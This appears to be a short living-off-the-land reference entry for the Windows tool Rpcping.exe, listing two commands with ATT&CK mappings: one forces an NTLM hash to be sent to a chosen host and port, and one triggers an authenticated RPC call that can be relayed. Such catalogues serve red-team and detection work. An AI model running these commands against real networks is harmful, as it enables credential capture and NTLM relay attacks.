.. /Rpcping.exe
Star

Used to verify rpc connection


Paths:

Resources:
Acknowledgements:

Detection:

Credentials

Send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.
rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM
Usecase: Capture credentials on a non-standard port
Privileges required: User
OS: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
MITRE ATT&CK®: T1003



Trigger an authenticated RPC call to the target server (/s) that could be relayed to a privileged resource (Sign not Set).
rpcping /s 10.0.0.35 /e 9997 /a connect /u NTLM
Usecase: Relay a NTLM authentication over RPC (ncacn_ip_tcp) on a custom port
Privileges required: User
OS: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
MITRE ATT&CK®: T1187